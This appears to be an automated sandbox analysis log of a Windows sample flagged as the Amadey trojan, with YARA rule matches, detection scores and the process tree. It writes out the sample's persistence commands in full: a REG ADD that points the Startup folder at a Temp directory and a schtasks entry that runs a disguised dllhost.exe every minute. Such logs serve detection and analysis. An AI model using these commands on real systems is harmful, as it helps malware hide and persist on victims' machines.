              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: S7AGd447vH.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: Process Memory Space: dllhost.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@13/2@18/1
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\152122461226583693405117
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
              Source: C:\Users\user\Desktop\S7AGd447vH.exe File created: C:\Users\user\AppData\Local\Temp\15212246122658369340
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Command line argument: ~IB0_2_004248D0
              Source: S7AGd447vH.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\S7AGd447vH.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: S7AGd447vH.exe ReversingLabs: Detection: 65%
              Source: S7AGd447vH.exe Virustotal: Detection: 69%
              Source: S7AGd447vH.exe String found in binary or memory: /pkg/Loader.exe
              Source: dllhost.exe String found in binary or memory: /pkg/Loader.exe
              Source: C:\Users\user\Desktop\S7AGd447vH.exe File read: C:\Users\user\Desktop\S7AGd447vH.exe
              Source: unknown Process created: C:\Users\user\Desktop\S7AGd447vH.exe "C:\Users\user\Desktop\S7AGd447vH.exe"
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Process created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe"
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
              Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: msimg32.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: slc.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\S7AGd447vH.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: msimg32.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe Section loaded: netutils.dll
